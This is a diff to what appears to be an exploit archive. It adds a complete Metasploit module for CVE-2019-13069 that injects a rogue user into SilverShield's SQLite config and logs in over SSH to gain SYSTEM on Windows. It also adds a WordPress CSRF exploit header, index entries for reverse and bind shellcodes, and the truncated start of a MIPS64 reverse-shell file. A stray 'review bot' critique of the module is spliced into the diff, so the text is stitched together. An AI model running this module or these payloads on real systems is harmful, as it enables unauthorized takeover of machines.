diff --git a/exploits/multiple/local/47197.rb b/exploits/multiple/local/47197.rb
new file mode 100755
index 000000000..a34fc710c
--- /dev/null
+++ b/exploits/multiple/local/47197.rb
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Exploit Title: extenua SilverSHielD 6.x local priviledge escalation
+# Google Dork: na
+# Date: 31 Jul 2019
+# Exploit Author: Ian Bredemeyer
+# Vendor Homepage: https://www.extenua.com
+# Software Link: https://www.extenua.com/silvershield
+# Version: 6.x
+# Tested on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
+# CVE: CVE-2019-13069
+
+# More Info: https://www.fobz.net/adv/ag47ex/info.html
+
+require 'sqlite3'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+require 'tempfile'
+require 'securerandom'
+require 'digest'
+
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Post::File
+ include Msf::Exploit::Remote::SSH
+ include Msf::Post::Windows::Services
+ include Msf::Post::Windows::FileInfo
+
+ def initialize(info={})
+ super( update_info(info,
+ 'Name' => 'Extenua SilverSHielD 6.x local privilege escalation',
+ 'Description' => %q{
+ Extenua SilverShield 6.x fails to secure its ProgramData subfolder.
+ This module exploits this by injecting a new user into the database and then
+ using that user to login the SSH service and obtain SYSTEM.
+ This results in to FULL SYSTEM COMPROMISE.
+ At time of discolsure, no fix has been issued by vendor.
+ },
+ 'Author' => [
+ 'Ian Bredemeyer',
+ ],
+ 'Platform' => [ 'win','unix' ], # 'unix' is needed, otherwise the Payload is flagged as incompatible
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' => [
+ [ 'Universal', {} ],
+ ],
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find',
+ },
+ },
+ 'DefaultTarget' => 0,
+ 'References' => [
+ [ 'CVE', '2019-13069' ],
+ [ 'URL', 'https://www.fobz.net/adv/ag47ex/info.html' ],
+ [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13069' ]
+ ],
+ 'DisclosureDate'=> "Jul 31 2019",
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+ ))
+
+ register_options([
+ OptPort.new('PF_PORT', [ true, 'Local port to PortFwd to victim', 20022 ]),
+ OptString.new('SS_IP', [ false, 'IP address SilverShield is listening on at the victim. Leave blank to detect.', '' ]),
+ OptPort.new('SS_PORT', [ false, 'Port SilverShield is listening on at the victim. Leave at 0 to detect.', 0 ]),
+ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+ OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 15])
+ ])
+ end
+
+
+
+ # Grabbed this bit from another exploit I was pulling apart... Need to trick the SSH session a bit
+ module ItsAShell
+ def _check_shell(*args)
+ true
+ end
+ end
+
+
+
+ # helper methods that normally come from Tcp
+ def rhost
+ return '127.0.0.1'
+ end
+ def rport
+ datastore['PF_PORT']
+ end
+
+
+
+ # Does a basic check of SilverShield... Does not fail if there is a problem, but will return false
+ def do_check_internal()
+
+ looks_ok = true # lets assume everything is OK...
+
+ # Try to get the path of the SilverShield service...
+ ss_serviceinfo = service_info("SilverShield") + ss_servicepath = ss_serviceinfo[:path] + if (ss_servicepath == '') + print_warning("Vulnerable Silvershield service is likely NOT running on the target system") + looks_ok = false + else + print_good("Silvershield service found: " + ss_servicepath) + end + + + # Try to read the version of Silvershield from the resigstry of the victim... + ss_version = "" + begin + ss_version = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\\extenua\\SilverShield', KEY_READ).query_value("Version").data + rescue ::Exception => e + print_warning "Cannot find SilverShield version in registry. Victim may not have vulnerable SilverShield installed" + looks_ok = false + end + if ss_version != "" + print_good("Silvershield version from registry: " + ss_version) + if ss_version[0..1] != "6." # If not version "6." something ? then this will not work... + print_warning("This version is not likely vulnerable to this module") + looks_ok = false + end + end + return looks_ok + + end + + + + + # Attempts a single SSH login to the victim via the local port forwarded to fictim. 
Returns valid connection if OK + def do_login() + factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) + opt_hash = { + :auth_methods => ['password'], + :port => rport, + :use_agent => false, + :config => false, + :proxy => factory, + :password => @@the_password, + :non_interactive => true, + :verify_host_key => :never + } + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, 'haxor4', opt_hash) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh_socket + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket) + ssh_socket = nil + return conn + else + return false + end + end + + + + # Attempts several times to connect through session back to SilverShield as haxor then open resulting shell as a new session. + def exploit_sub + x = 0 + while x < 5 do + x = x + 1 + print_status "SSH login attempt " + x.to_s + ". May take a moment..." + + conn = do_login() + if conn + print_good "Successful login. Passing to handler..." + handler(conn.lsock) + return true + end + end + return false + end + + + + def check() + if do_check_internal + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + + + # The guts of it... + def exploit + + # Some basic setup... + payload_instance.extend(ItsAShell) + factory = ssh_socket_factory + + + # Do a quick check... well, sort of, just shows info. We won't stop, just report to user... 
+ do_check_internal() + + + # We will generate a NEW password and salt. Then get the relevant hash to inject... + @@the_password = SecureRandom.hex + @@the_password_salt = SecureRandom.hex[0..7] + @@the_password_hash = Digest::MD5.hexdigest @@the_password_salt + @@the_password + vprint_status("generated- user:haxor4 password:" + @@the_password + " salt:" + @@the_password_salt + " => hash(md5):" + @@the_password_hash) + + + # Get a tempfile on the local system. Garbage collection will automaticlly kill it off later... + # This is a temp location where we will put the sqlite database so we can work on it on the local machine... + tfilehandle = Tempfile.new('ss.db.') + tfilehandle.close + wfile = tfilehandle.path + + + #Try to get the ProgramData path from the victim, this is where the SQLite databasae is held... + progdata = session.fs.file.expand_path("%ProgramData%") # client.sys.config.getenv('PROGRAMDATA') + print_status 'Remote %ProgramData% = ' + progdata + + + # Lets check the file exists, then download from the victim to the local file system... + filecheck = progdata + '\SilverShield\SilverShield.config.sqlite' + fsrc = filecheck + fdes = wfile + print_status 'Try download: ' + fsrc + ' to: ' + fdes + begin + ::Timeout.timeout(5) do + session.fs.file.download_file(fdes, fsrc) + end + rescue ::Exception => e + print_error "Cannot download #{fsrc} to #{fdes} #{e.class} : #{e.message}" + print_error "Does victim even have vulnerable SilverShield installed ?" + fail_with(Failure::Unknown, "Fail download") + end + + + # Try to connect with sqlite locally... + vprint_status 'Trying to open database ' + wfile + db = SQLite3::Database.open wfile + + + # Remove haxor4 if its already there, just incase by pure chance a user with that name already exists... + vprint_status 'remove user "haxor4" if its already in there...' 
+ results = db.execute "delete from USERS where vcusername='haxor4'" + answer = "" + results.each { |row| answer = answer + row.join(',') } + + + # Insert the haxor user... we will use this later to connect back in as SYSTEM + vprint_status 'insert user "haxor4" with password "' + @@the_password + '" into database' + results = db.execute "INSERT INTO USERS (CUSERID, VCUSERNAME, CSALT,CPASSWORD, VCHOMEDIR, BGETFILE, BPUTFILE, BDELFILE, BMODFILE, BRENFILE, BLISTDIR, BMAKEDIR, BDELDIR, BRENDIR, IAUTHTYPES, BAUTHALL, BALLOWSSH, BALLOWSFTP, BALLOWFWD, BALLOWDAV, IACCOUNTSTATUS, BAUTODISABLE, DTAUTODISABLE, BWINPASSWD, BISADMIN)VALUES(\"{11112222-3333-4444-5555666677778888}\",\"haxor4\",\"" + @@the_password_salt + "\",\"" + @@the_password_hash + "\",\"c:\\\",1,1,1,1,1,1,1,1,1,20,0,1,0,0,0,0,0,-700000.0, 0, 1);" + answer = "" + results.each { |row| answer = answer + row.join(',') } + print_good 'user inserted OK' + + + # Dump out local port that SilverShield has been configured to listen on at the victim machine... + results = db.execute "select IPORT from maincfg" + answer = "" + results.each { |row| answer = answer + row.join(',') } + ss_port = answer + print_status "SilverShield config shows listening on port: " + ss_port + if (datastore['SS_PORT'] != 0) + ss_port = datastore['SS_PORT'].to_s + print_status "SS_PORT setting forcing port to " + ss_port + end + if (ss_port == '') + ss_port = '22' + end + + + # Dump out local IP that SilverShield has been configured to listen on at the victim machine... 
+ results = db.execute "select CBINDIP from maincfg" + answer = "" + results.each { |row| answer = answer + row.join(',') } + ss_ip = answer + print_status "SilverShield config shows listening on local IP: " + ss_ip + if (datastore['SS_IP'] != '') + ss_ip = datastore['SS_IP'] + print_status "SS_IP setting forcing IP to " + ss_ip + end + # If the override AND the detection have come up with nothing, then use the default 127.0.0.1 + if (ss_ip == '') + ss_ip = '127.0.0.1' + end + + + # Close the database. Keep it neat + db.close + + + # Now lets upload this file back to the victim...due to bad folder permissions, we can sneak our bad config back in. Yay + fdes = filecheck + fsrc = wfile + print_status 'Sending modded file back to victim' + begin + ::Timeout.timeout(5) do + session.fs.file.upload_file(fdes, fsrc) + end + rescue ::Exception => e + print_error "Cannot upload #{fsrc} to #{fdes} #{e.class} : #{e.message}" + print_error "Perhaps this server is not vulnerable or has some other mitigation." + fail_with(Failure::Unknown, "Fail upload") + end + sleep 4 # wait a few seconds... this gives the SilverShield service some time to see the settings have changed. + + + # Delete the port if its already pointing somewhwere... This a bit ugly and may generate an error, but I don't care. + client.run_cmd("portfwd delete -l " + datastore['PF_PORT'].to_s) + + + # Forward a local port through to the ssh port on the victim. + client.run_cmd("portfwd add -l " + datastore['PF_PORT'].to_s + " -p " + ss_port + " -r " + ss_ip) + + + # Now do ssh work and hand off the session to the handler... + exploit_sub + + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/47295.html b/exploits/php/webapps/47295.html new file mode 100644 index 000000000..5948e4e44 --- /dev/null +++ b/exploits/php/webapps/47295.html 
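Review bot: In `exploit`, the port and bind address handed to `client.run_cmd("portfwd add ...")` are read straight out of the victim's `maincfg` table, so they are target-controlled data and should be validated before being spliced into a console command, e.g. `fail_with(Failure::BadConfig, 'bad SilverShield listener config') unless ss_port.match?(/\A\d+\z/) && Rex::Socket.is_ipv4?(ss_ip)`. The three `rescue ::Exception => e` blocks (the registry read in `do_check_internal`, the download and the upload in `exploit`) also swallow Interrupt and SystemExit and the first one never uses `e`; `rescue ::StandardError => e` (or `Rex::Post::Meterpreter::RequestError` for the file transfers) is the idiom, and `Failure::NotFound` / `Failure::NotVulnerable` describe those two failures better than `Failure::Unknown`. `@@the_password`, `@@the_password_salt` and `@@the_password_hash` are class variables shared by every instance of the module, so a second run in the same framework process can overwrite a concurrent one's credential; plain `@the_password` instance variables are the Metasploit convention and `do_login` can read them the same way. The Tempfile holding the downloaded and modified config is closed but never unlinked, so the copy containing the injected credential stays in the local temp directory until garbage collection; `Tempfile.create('ss.db.') { |f| ... }` or `tfilehandle.unlink` in an `ensure` removes it deterministically. The `INSERT INTO USERS` builds its VALUES by string concatenation and relies on SQLite tolerating double-quoted string literals; `db.execute("INSERT ... VALUES (?, ?, ...)", [salt, hash, ...])` with bind parameters is the sqlite3 idiom and removes the hand escaping.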
@@ -0,0 +1,25 @@
+# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
+# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
+# Date: 18 july, 2019
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
+# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
+# Version: 2.2.1
+# Tested on: Apache/2.2.24 (CentOS)
+# CVE : Fresh
+
+#About Plugin
+The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
+#Vulnerable Description
+WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
+## CSRF Code
+Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7fa453b14..c7686fef7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10656,6 +10656,7 @@ id,file,description,date,author,type,platform,port
 47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
+47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
@@ -41653,3 +41654,4 @@ id,file,description,date,author,type,platform,port
 47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
+47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 831e71cfb..8a1556c3e 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -996,6 +996,7 @@ id,file,description,date,author,type,platform
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
-47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
-47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
 47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux
diff --git a/shellcodes/linux/47296.c b/shellcodes/linux/47296.c
new file mode 100644
index 000000000..8b14c90f1
--- /dev/null
+++ b/shellcodes/linux/47296.c
@@ -0,0 +1,113 @@
+/*
+ * # Reverse shell shellcode for Linux MIPS64 (mips64el)
+ * # Default port: tcp/4444
+ * # Host: localhost
+ * # Date: August 19 - 2019
+ * # Author: Antonio de la Piedra
+ * # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
+ * # Size: 157 bytes
+ * # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
+ */
+
+#include